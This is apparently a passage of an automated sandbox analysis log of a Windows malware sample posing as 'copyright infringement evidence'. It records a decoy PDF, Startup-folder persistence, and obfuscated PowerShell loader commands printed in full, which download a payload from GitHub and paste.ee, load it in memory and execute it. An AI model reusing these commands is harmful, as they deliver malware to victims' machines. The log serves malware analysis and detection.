            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeCode function: 0_2_00007FF7A18DA298 CloseHandle,UnhandledExceptionFilter,SetUnhandledExceptionFilter,memcmp,memmove,__current_exception_context,__CxxFrameHandler3,__current_exception,__C_specific_handler,memmove,0_2_00007FF7A18DA298
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeCode function: 0_2_00007FF7A18DA298 CloseHandle,UnhandledExceptionFilter,SetUnhandledExceptionFilter,memcmp,memmove,__current_exception_context,__CxxFrameHandler3,__current_exception,__C_specific_handler,memmove,0_2_00007FF7A18DA298
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeCode function: 0_2_00007FF7A18DA298 CloseHandle,UnhandledExceptionFilter,SetUnhandledExceptionFilter,memcmp,memmove,__current_exception_context,__CxxFrameHandler3,__current_exception,__C_specific_handler,memmove,0_2_00007FF7A18DA298
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeCode function: 0_2_00007FF7A18DA298 CloseHandle,UnhandledExceptionFilter,SetUnhandledExceptionFilter,memcmp,memmove,__current_exception_context,__CxxFrameHandler3,__current_exception,__C_specific_handler,memmove,0_2_00007FF7A18DA298
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Windows\System32\wscript.exeNetwork Connect: 188.114.96.3 443
            Source: Yara matchFile source: amsi64_8000.amsi.csv, type: OTHER
            Source: Yara matchFile source: amsi64_1784.amsi.csv, type: OTHER
            Source: Yara matchFile source: amsi64_8824.amsi.csv, type: OTHER
            Source: Yara matchFile source: amsi64_9176.amsi.csv, type: OTHER
            Source: Yara matchFile source: amsi64_3668.amsi.csv, type: OTHER
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LgAoACAAJABlAE4AdgA6AGMATwBNAFMAUABFAGMAWwA0ACwAMQA1ACwAMgA1AF0ALQBKAG8ASQBOACcAJwApACgAIAAoACgAJwB7ADIAfQB1AHIAbAAgAD0AIAB7ADAAJwArACcAfQBoAHQAdAAnACsAJwBwAHMAOgAvAC8AcgBhAHcALgAnACsAJwBnAGkAdABoACcAKwAnAHUAJwArACcAYgB1AHMAZQByACcAKwAnAGMAbwBuAHQAJwArACcAZQBuAHQALgBjAG8AJwArACcAbQAvAE4AJwArACcAbwBEAGUAdABlAGMAJwArACcAdABPACcAKwAnAG4ALwBOAG8ARABlACcAKwAnAHQAZQBjAHQATwBuAC8AJwArACcAcgAnACsAJwBlACcAKwAnAGYAJwArACcAcwAvACcAKwAnAGgAZQAnACsAJwBhAGQAcwAvAG0AYQBpAG4ALwBEACcAKwAnAGUAdAAnACsAJwBhAGgATgBvAHQAZQBfAEoALgB0AHgAdAAnACsAJwB7ADAAfQAnACsAJwA7ACAAJwArACcAewAnACsAJwAyAH0AYgBhAHMAJwArACcAZQA2ADQAQwBvACcAKwAnAG4AJwArACcAdABlAG4AJwArACcAdAAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAJwArACcAIABTACcAKwAnAHkAcwB0ACcAKwAnAGUAbQAnACsAJwAuAE4AZQB0ACcAKwAnAC4AVwAnACsAJwBlACcAKwAnAGIAJwArACcAQwBsAGkAZQAnACsAJwBuACcAKwAnAHQAJwArACcAKQAuACcAKwAnAEQAJwArACcAbwB3AG4AbABvACcAKwAnAGEAJwArACcAZABTAHQAJwArACcAcgAnACsAJwBpACcAKwAnAG4AZwAnACsAJwAoAHsAJwArACcAMgB9AHUAcgBsACkAOwAgACcAKwAnAHsAMgB9AGIAaQAnACsAJwBuAGEAJwArACcAcgB5AEMAbwBuACcAKwAnAHQAZQBuAHQAIAA9ACAAWwBTACcAKwAnAHkAcwB0AGUAbQAuACcAKwAnAEMAbwBuAHYAZQByACcAKwAnAHQAXQA6ACcAKwAnADoARgByACcAKwAnAG8AJwArACcAbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAHsAMgB9AGIAYQAnACsAJwBzAGUANgA0ACcAKwAnAEMAJwArACcAbwBuAHQAJwArACcAZQBuAHQAKQAnACsAJwA7ACcAKwAnACAAewAyAH0AJwArACcAYQBzAHMAZQAnACsAJwBtACcAKwAnAGIAJwArACcAbAB5ACAAJwArACcAPQAgAFsAUgBlAGYAJwArACcAbABlACcAKwAnAGMAJwArACcAdABpACcAKwAnAG8AbgAuAEEAcwBzAGUAbQBiACcAKwAnAGwAeQBdADoAOgBMACcAKwAnAG8AYQAnACsAJwBkACcAKwAnACgAewAnACsAJwAyAH0AYgBpAG4AYQAnACsAJwByAHkAJwArACcAQwAnACsAJwBvAG4AdABlAG4AdAApADsAIAB7ADIAfQAnACsAJwBjACcAKwAnAG8AbQBtAGEAJwArACcAbgAnACsAJwBkACAAPQAnACsAJwAgAHsAMAB9AFsAJwArACcAZABuAGwAaQBiAC4AJwArACcASQBPAC4ASABvAG0AZQBdADoAOgAnACsAJwBWACcAKwAnAEEASQAoACcAKwAnAHsAJwArACcAMwAnACsAJwB9ADAALwAnACsAJwBLACcAKwAnAFMAQQBjACcAKwAnAEYAJwArACcALwBkACcAKwAnAC8AZQBlAC4AJwArACcAZQB0ACcAKwAnAHMAJwArACcAYQAnACsAJwBwAC8ALwA6AHMAcAB0ACcAKwAnAHQAaAAnACsAJwB7ADMAfQAnACsAJwAsACAAewAzAH0AMQAnACsAJwB7ADMAfQAnACsAJwAsACAAewAzACcAKwAnAH0AJwArACcAQwA6ACcAKwAnAHsAJwArACcAMQAnACsAJwB9AFAAcgBvACcAKwAnAGcAcgAnACsAJwBhAG0ARAAnACsAJwBhACcAKwAnAHQAJwArACcAYQB7ADEAJwArACcAfQB7ACcAKwAnADMAfQAsACAAewAnACsAJwAzACcAKwAnAH0AJwArACcAcgBhACcAKwAnAGoAYQBkAG8AJwArACcAewAzACcAKwAnAH0ALAAgACcAKwAnAHsAMwB9AEEAZAAnACsAJwBkACcAKwAnAEkAbgBQACcAKwAnAHIAbwBjAGUAcwBzADMAMgB7ADMAfQAsACcAKwAnACAAewAzACcAKwAnAH0AJwArACcAZAAnACsAJwBlAHMAJwArACcAYQB0ACcAKwAnAGkAdgBhAGQAbwB7ADMAfQAsACcAKwAnAHsAMwB9ACcAKwAnAHsAMwB9ACkAJwArACcAewAnACsAJwAwAH0AJwArACcAOwAnACsAJwAgAEkAJwArACcAbgB2AG8AawAnACsAJwBlAC0ARQB4ACcAKwAnAHAAJwArACcAcgBlAHMAcwBpAG8AbgAgAHsAMgAnACsAJwB9AGMAbwBtACcAKwAnAG0AJwArACcAYQBuACcAKwAnAGQAJwApACAALQBGACAAWwBjAEgAYQByAF0AMwA5ACwAWwBjAEgAYQByAF0AOQAyACwAWwBjAEgAYQByAF0AMwA2ACwAWwBjAEgAYQByAF0AMwA0ACkAIAApAA==';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Fromba
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /C start C:\Users\Public\Documents\Benefits-_JD-_Photo-_Video-_UNQILO-_Q4-_2024_Benefits-_JD-_Photo.pdfJump to behavior
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeProcess created: C:\Windows\System32\wscript.exe "wscript.exe" C:\Users\Public\Documents\2p_bee.jsJump to behavior
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /C echo %username%Jump to behavior
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeProcess created: C:\Windows\System32\wscript.exe "wscript.exe" C:\Users\Public\Documents\2x_bee.jsJump to behavior
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /C echo %username%Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\Public\Documents\Benefits-_JD-_Photo-_Video-_UNQILO-_Q4-_2024_Benefits-_JD-_Photo.pdf"Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\2p_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LgAoACAAJABlAE4AdgA6AGMATwBNAFMAUABFAGMAWwA0ACwAMQA1ACwAMgA1AF0ALQBKAG8ASQBOACcAJwApACgAIAAoACgAJwB7ADIAfQB1AHIAbAAgAD0AIAB7ADAAJwArACcAfQBoAHQAdAAnACsAJwBwAHMAOgAvAC8AcgBhAHcALgAnACsAJwBnAGkAdABoACcAKwAnAHUAJwArACcAYgB1AHMAZQByACcAKwAnAGMAbwBuAHQAJwArACcAZQBuAHQALgBjAG8AJwArACcAbQAvAE4AJwArACcAbwBEAGUAdABlAGMAJwArACcAdABPACcAKwAnAG4ALwBOAG8ARABlACcAKwAnAHQAZQBjAHQATwBuAC8AJwArACcAcgAnACsAJwBlACcAKwAnAGYAJwArACcAcwAvACcAKwAnAGgAZQAnACsAJwBhAGQAcwAvAG0AYQBpAG4ALwBEACcAKwAnAGUAdAAnACsAJwBhAGgATgBvAHQAZQBfAEoALgB0AHgAdAAnACsAJwB7ADAAfQAnACsAJwA7ACAAJwArACcAewAnACsAJwAyAH0AYgBhAHMAJwArACcAZQA2ADQAQwBvACcAKwAnAG4AJwArACcAdABlAG4AJwArACcAdAAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAJwArACcAIABTACcAKwAnAHkAcwB0ACcAKwAnAGUAbQAnACsAJwAuAE4AZQB0ACcAKwAnAC4AVwAnACsAJwBlACcAKwAnAGIAJwArACcAQwBsAGkAZQAnACsAJwBuACcAKwAnAHQAJwArACcAKQAuACcAKwAnAEQAJwArACcAbwB3AG4AbABvACcAKwAnAGEAJwArACcAZABTAHQAJwArACcAcgAnACsAJwBpACcAKwAnAG4AZwAnACsAJwAoAHsAJwArACcAMgB9AHUAcgBsACkAOwAgACcAKwAnAHsAMgB9AGIAaQAnACsAJwBuAGEAJwArACcAcgB5AEMAbwBuACcAKwAnAHQAZQBuAHQAIAA9ACAAWwBTACcAKwAnAHkAcwB0AGUAbQAuACcAKwAnAEMAbwBuAHYAZQByACcAKwAnAHQAXQA6ACcAKwAnADoARgByACcAKwAnAG8AJwArACcAbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAHsAMgB9AGIAYQAnACsAJwBzAGUANgA0ACcAKwAnAEMAJwArACcAbwBuAHQAJwArACcAZQBuAHQAKQAnACsAJwA7ACcAKwAnACAAewAyAH0AJwArACcAYQBzAHMAZQAnACsAJwBtACcAKwAnAGIAJwArACcAbAB5ACAAJwArACcAPQAgAFsAUgBlAGYAJwArACcAbABlACcAKwAnAGMAJwArACcAdABpACcAKwAnAG8AbgAuAEEAcwBzAGUAbQBiACcAKwAnAGwAeQBdADoAOgBMACcAKwAnAG8AYQAnACsAJwBkACcAKwAnACgAewAnACsAJwAyAH0AYgBpAG4AYQAnACsAJwByAHkAJwArACcAQwAnACsAJwBvAG4AdABlAG4AdAApADsAIAB7ADIAfQAnACsAJwBjACcAKwAnAG8AbQBtAGEAJwArACcAbgAnACsAJwBkACAAPQAnACsAJwAgAHsAMAB9AFsAJwArACcAZABuAGwAaQBiAC4AJwArACcASQBPAC4ASABvAG0AZQBdADoAOgAnACsAJwBWACcAKwAnAEEASQAoACcAKwAnAHsAJwArACcAMwAnACsAJwB9ADAALwAnACsAJwBLACcAKwAnAFMAQQBjACcAKwAnAEYAJwArACcALwBkACcAKwAnAC8AZQBlAC4AJwArACcAZQB0ACcAKwAnAHMAJwArACcAYQAnACsAJwBwAC8ALwA6AHMAcAB0ACcAKwAnAHQAaAAnACsAJwB7ADMAfQAnACsAJwAsACAAewAzAH0AMQAnACsAJwB7ADMAfQAnACsAJwAsACAAewAzACcAKwAnAH0AJwArACcAQwA6ACcAKwAnAHsAJwArACcAMQAnACsAJwB9AFAAcgBvACcAKwAnAGcAcgAnACsAJwBhAG0ARAAnACsAJwBhACcAKwAnAHQAJwArACcAYQB7ADEAJwArACcAfQB7ACcAKwAnADMAfQAsACAAewAnACsAJwAzACcAKwAnAH0AJwArACcAcgBhACcAKwAnAGoAYQBkAG8AJwArACcAewAzACcAKwAnAH0ALAAgACcAKwAnAHsAMwB9AEEAZAAnACsAJwBkACcAKwAnAEkAbgBQACcAKwAnAHIAbwBjAGUAcwBzADMAMgB7ADMAfQAsACcAKwAnACAAewAzACcAKwAnAH0AJwArACcAZAAnACsAJwBlAHMAJwArACcAYQB0ACcAKwAnAGkAdgBhAGQAbwB7ADMAfQAsACcAKwAnAHsAMwB9ACcAKwAnAHsAMwB9ACkAJwArACcAewAnACsAJwAwAH0AJwArACcAOwAnACsAJwAgAEkAJwArACcAbgB2AG8AawAnACsAJwBlAC0ARQB4ACcAKwAnAHAAJwArACcAcgBlAHMAcwBpAG8AbgAgAHsAMgAnACsAJwB9AGMAbwBtACcAKwAnAG0AJwArACcAYQBuACcAKwAnAGQAJwApACAALQBGACAAWwBjAEgAYQByAF0AMwA5ACwAWwBjAEgAYQByAF0AOQAyACwAWwBjAEgAYQByAF0AMwA2ACwAWwBjAEgAYQByAF0AMwA0ACkAIAApAA==';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::FrombaJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\2x_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAoACcAQwBTAEUAJwArACcAdQByAGwAIAA9ACAAJwArACcASwBrACcAKwAnAHMAJwArACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAAnACsAJwB1AGIAdQBzAGUAcgBjAG8AbgAnACsAJwB0AGUAbgB0AC4AYwBvACcAKwAnAG0ALwBOAG8AJwArACcARABlAHQAZQBjAHQATwBuAC8ATgBvAEQAZQB0AGUAYwAnACsAJwB0AE8AbgAvACcAKwAnAHIAZQBmAHMAJwArACcALwBoAGUAJwArACcAYQBkAHMALwBtAGEAaQAnACsAJwBuAC8ARABlAHQAJwArACcAYQBoAE4AbwB0ACcAKwAnAGUAXwBKAC4AdAB4AHQAJwArACcASwBrACcAKwAnAHMAOwAgAEMAUwAnACsAJwBFAGIAYQBzAGUANgA0ACcAKwAnAEMAbwBuAHQAJwArACcAZQAnACsAJwBuAHQAIAA9ACAAJwArACcAKABOACcAKwAnAGUAdwAtAE8AYgAnACsAJwBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAJwArACcAbABpACcAKwAnAGUAbgB0ACkALgBEACcAKwAnAG8AdwBuAGwAbwBhAGQAJwArACcAUwB0AHIAJwArACcAaQBuAGcAJwArACcAKABDAFMARQB1AHIAbAApACcAKwAnADsAIABDAFMARQBiAGkAbgBhAHIAeQBDAG8AJwArACcAbgB0AGUAbgB0ACAAPQAgACcAKwAnAFsAUwB5AHMAdABlAG0ALgBDAG8AJwArACcAbgB2AGUAcgB0AF0AOgA6ACcAKwAnAEYAcgBvAG0AQgBhACcAKwAnAHMAZQAnACsAJwA2ADQAJwArACcAUwAnACsAJwB0AHIAJwArACcAaQAnACsAJwBuAGcAKABDAFMARQBiAGEAcwBlADYANABDAG8AbgB0AGUAbgB0ACcAKwAnACkAOwAnACsAJwAgAEMAUwBFAGEAcwBzAGUAbQAnACsAJwBiAGwAeQAgAD0AJwArACcAIABbACcAKwAnAFIAZQAnACsAJwBmAGwAZQBjAHQAJwArACcAaQBvACcAKwAnAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoAEMAJwArACcAUwAnACsAJwBFAGIAaQBuACcAKwAnAGEAcgB5AEMAbwBuAHQAZQBuACcAKwAnAHQAKQA7ACAAQwBTAEUAYwAnACsAJwBvAG0AbQAnACsAJwBhAG4AZAAgAD0AIAAnACsAJwBLACcAKwAnAGsAJwArACcAcwBbACcAKwAnAGQAbgBsAGkAYgAuAEkATwAuAEgAJwArACcAbwBtACcAKwAnAGUAXQAnACsAJwA6ADoAVgBBAEkAKABvAE4ASQAwAC8AegBiAEUAdQBjACcAKwAnAC8AZAAvAGUAZQAuACcAKwAnAGUAJwArACcAdABzAGEAcAAvAC8AOgBzAHAAdAB0ACcAKwAnAGgAbwBOACcAKwAnAEkALAAgAG8ATgBJADEAbwBOACcAKwAnAEkALAAgAG8ATgBJAEMAOgAxACcAKwAnAGwAcABQAHIAbwBnACcAKwAnAHIAYQBtAEQAJwArACcAYQB0AGEAMQBsAHAAbwBOAEkALAAgAG8AJwArACcATgAnACsAJwBJAHQAbwBuAGQAaQBuAGgAbwBvAE4ASQAsACAAJwArACcAbwBOAEkAQQAnACsAJwBwAHAATABhAHUAJwArACcAbgBjAGgAbwBOACcAKwAnAEkALAAgAG8AJwArACcATgBJAGQAZQBzAGEAdABpAHYAYQAnACsAJwBkAG8AbwBOAEkAJwArACcALABvAE4ASQBvACcAKwAnAE4ASQApAEsAawBzADsAIABJAG4AdgBvAGsAZQAtAEUAJwArACcAeABwAHIAJwArACcAZQBzAHMAaQAnACsAJwBvACcAKwAnAG4AJwArACcAIABDACcAKwAnAFMARQBjAG8AbQBtAGEAbgBkACcAKQAgAC0AYwBSAEUAUABsAEEAQwBlACAAIAAoAFsAQwBIAEEAcgBdADYANwArAFsAQwBIAEEAcgBdADgAMwArAFsAQwBIAEEAcgBdADYAOQApACwAWwBDAEgAQQByAF0AMwA2ACAALQBjAFIARQBQAGwAQQBDAGUAIAAoAFsAQwBIAEEAcgBdADEAMQAxACsAWwBDAEgAQQByAF0ANwA4ACsAWwBDAEgAQQByAF0ANwAzACkALABbAEMASABBAHIAXQAzADQALQBjAFIARQBQAGwAQQBDAGUAIAAgACcASwBrAHMAJwAsAFsAQwBIAEEAcgBdADMAOQAgACAALQBSAGUAcABsAEEAYwBlACAAKABbAEMASABBAHIAXQA0ADkAKwBbAEMASABBAHIAXQAxADAAOAArAFsAQwBIAEEAcgBdADEAMQAyACkALABbAEMASABBAHIAXQA5ADIAKQAgAHwAaQBlAHgA';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\2x_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\2p_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe wscript.exe "C:\Users\Public\Documents\2p_bee.js"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2p_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LgAoACAAJABlAE4AdgA6AGMATwBNAFMAUABFAGMAWwA0ACwAMQA1ACwAMgA1AF0ALQBKAG8ASQBOACcAJwApACgAIAAoACgAJwB7ADIAfQB1AHIAbAAgAD0AIAB7ADAAJwArACcAfQBoAHQAdAAnACsAJwBwAHMAOgAvAC8AcgBhAHcALgAnACsAJwBnAGkAdABoACcAKwAnAHUAJwArACcAYgB1AHMAZQByACcAKwAnAGMAbwBuAHQAJwArACcAZQBuAHQALgBjAG8AJwArACcAbQAvAE4AJwArACcAbwBEAGUAdABlAGMAJwArACcAdABPACcAKwAnAG4ALwBOAG8ARABlACcAKwAnAHQAZQBjAHQATwBuAC8AJwArACcAcgAnACsAJwBlACcAKwAnAGYAJwArACcAcwAvACcAKwAnAGgAZQAnACsAJwBhAGQAcwAvAG0AYQBpAG4ALwBEACcAKwAnAGUAdAAnACsAJwBhAGgATgBvAHQAZQBfAEoALgB0AHgAdAAnACsAJwB7ADAAfQAnACsAJwA7ACAAJwArACcAewAnACsAJwAyAH0AYgBhAHMAJwArACcAZQA2ADQAQwBvACcAKwAnAG4AJwArACcAdABlAG4AJwArACcAdAAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAJwArACcAIABTACcAKwAnAHkAcwB0ACcAKwAnAGUAbQAnACsAJwAuAE4AZQB0ACcAKwAnAC4AVwAnACsAJwBlACcAKwAnAGIAJwArACcAQwBsAGkAZQAnACsAJwBuACcAKwAnAHQAJwArACcAKQAuACcAKwAnAEQAJwArACcAbwB3AG4AbABvACcAKwAnAGEAJwArACcAZABTAHQAJwArACcAcgAnACsAJwBpACcAKwAnAG4AZwAnACsAJwAoAHsAJwArACcAMgB9AHUAcgBsACkAOwAgACcAKwAnAHsAMgB9AGIAaQAnACsAJwBuAGEAJwArACcAcgB5AEMAbwBuACcAKwAnAHQAZQBuAHQAIAA9ACAAWwBTACcAKwAnAHkAcwB0AGUAbQAuACcAKwAnAEMAbwBuAHYAZQByACcAKwAnAHQAXQA6ACcAKwAnADoARgByACcAKwAnAG8AJwArACcAbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAHsAMgB9AGIAYQAnACsAJwBzAGUANgA0ACcAKwAnAEMAJwArACcAbwBuAHQAJwArACcAZQBuAHQAKQAnACsAJwA7ACcAKwAnACAAewAyAH0AJwArACcAYQBzAHMAZQAnACsAJwBtACcAKwAnAGIAJwArACcAbAB5ACAAJwArACcAPQAgAFsAUgBlAGYAJwArACcAbABlACcAKwAnAGMAJwArACcAdABpACcAKwAnAG8AbgAuAEEAcwBzAGUAbQBiACcAKwAnAGwAeQBdADoAOgBMACcAKwAnAG8AYQAnACsAJwBkACcAKwAnACgAewAnACsAJwAyAH0AYgBpAG4AYQAnACsAJwByAHkAJwArACcAQwAnACsAJwBvAG4AdABlAG4AdAApADsAIAB7ADIAfQAnACsAJwBjACcAKwAnAG8AbQBtAGEAJwArACcAbgAnACsAJwBkACAAPQAnACsAJwAgAHsAMAB9AFsAJwArACcAZABuAGwAaQBiAC4AJwArACcASQBPAC4ASABvAG0AZQBdADoAOgAnACsAJwBWACcAKwAnAEEASQAoACcAKwAnAHsAJwArACcAMwAnACsAJwB9ADAALwAnACsAJwBLACcAKwAnAFMAQQBjACcAKwAnAEYAJwArACcALwBkACcAKwAnAC8AZQBlAC4AJwArACcAZQB0ACcAKwAnAHMAJwArACcAYQAnACsAJwBwAC8ALwA6AHMAcAB0ACcAKwAnAHQAaAAnACsAJwB7ADMAfQAnACsAJwAsACAAewAzAH0AMQAnACsAJwB7ADMAfQAnACsAJwAsACAAewAzACcAKwAnAH0AJwArACcAQwA6ACcAKwAnAHsAJwArACcAMQAnACsAJwB9AFAAcgBvACcAKwAnAGcAcgAnACsAJwBhAG0ARAAnACsAJwBhACcAKwAnAHQAJwArACcAYQB7ADEAJwArACcAfQB7ACcAKwAnADMAfQAsACAAewAnACsAJwAzACcAKwAnAH0AJwArACcAcgBhACcAKwAnAGoAYQBkAG8AJwArACcAewAzACcAKwAnAH0ALAAgACcAKwAnAHsAMwB9AEEAZAAnACsAJwBkACcAKwAnAEkAbgBQACcAKwAnAHIAbwBjAGUAcwBzADMAMgB7ADMAfQAsACcAKwAnACAAewAzACcAKwAnAH0AJwArACcAZAAnACsAJwBlAHMAJwArACcAYQB0ACcAKwAnAGkAdgBhAGQAbwB7ADMAfQAsACcAKwAnAHsAMwB9ACcAKwAnAHsAMwB9ACkAJwArACcAewAnACsAJwAwAH0AJwArACcAOwAnACsAJwAgAEkAJwArACcAbgB2AG8AawAnACsAJwBlAC0ARQB4ACcAKwAnAHAAJwArACcAcgBlAHMAcwBpAG8AbgAgAHsAMgAnACsAJwB9AGMAbwBtACcAKwAnAG0AJwArACcAYQBuACcAKwAnAGQAJwApACAALQBGACAAWwBjAEgAYQByAF0AMwA5ACwAWwBjAEgAYQByAF0AOQAyACwAWwBjAEgAYQByAF0AMwA2ACwAWwBjAEgAYQByAF0AMwA0ACkAIAApAA==';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Fromba
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2p_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $eNv:cOMSPEc[4,15,25]-JoIN'')( (('{2}url = {0'+'}htt'+'ps://raw.'+'gith'+'u'+'buser'+'cont'+'ent.co'+'m/N'+'oDetec'+'tO'+'n/NoDe'+'tectOn/'+'r'+'e'+'f'+'s/'+'he'+'ads/main/D'+'et'+'ahNote_J.txt'+'{0}'+'; '+'{'+'2}bas'+'e64Co'+'n'+'ten'+'t = (New-Object'+' S'+'yst'+'em'+'.Net'+'.W'+'e'+'b'+'Clie'+'n'+'t'+').'+'D'+'ownlo'+'a'+'dSt'+'r'+'i'+'ng'+'({'+'2}url); '+'{2}bi'+'na'+'ryCon'+'tent = [S'+'ystem.'+'Conver'+'t]:'+':Fr'+'o'+'mBase64String({2}ba'+'se64'+'C'+'ont'+'ent)'+';'+' {2}'+'asse'+'m'+'b'+'ly '+'= [Ref'+'le'+'c'+'ti'+'on.Assemb'+'ly]::L'+'oa'+'d'+'({'+'2}bina'+'ry'+'C'+'ontent); {2}'+'c'+'omma'+'n'+'d ='+' {0}['+'dnlib.'+'IO.Home]::'+'V'+'AI('+'{'+'3'+'}0/'+'K'+'SAc'+'F'+'/d'+'/ee.'+'et'+'s'+'a'+'p//:spt'+'th'+'{3}'+', {3}1'+'{3}'+', {3'+'}'+'C:'+'{'+'1'+'}Pro'+'gr'+'amD'+'a'+'t'+'a{1'+'}{'+'3}, {'+'3'+'}'+'ra'+'jado'+'{3'+'}, '+'{3}Ad'+'d'+'InP'+'rocess32{3},'+' {3'+'}'+'d'+'es'+'at'+'ivado{3},'+'{3}'+'{3})'+'{'+'0}'+';'+' I'+'nvok'+'e-Ex'+'p'+'ression {2'+'}com'+'m'+'an'+'d') -F [cHar]39,[cHar]92,[cHar]36,[cHar]34) )"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('CSE'+'url = '+'Kk'+'s'+'https://raw.gith'+'ubusercon'+'tent.co'+'m/No'+'DetectOn/NoDetec'+'tOn/'+'refs'+'/he'+'ads/mai'+'n/Det'+'ahNot'+'e_J.txt'+'Kk'+'s; CS'+'Ebase64'+'Cont'+'e'+'nt = '+'(N'+'ew-Ob'+'ject System.Net.WebC'+'li'+'ent).D'+'ownload'+'Str'+'ing'+'(CSEurl)'+'; CSEbinaryCo'+'ntent = '+'[System.Co'+'nvert]::'+'FromBa'+'se'+'64'+'S'+'tr'+'i'+'ng(CSEbase64Content'+');'+' CSEassem'+'bly ='+' 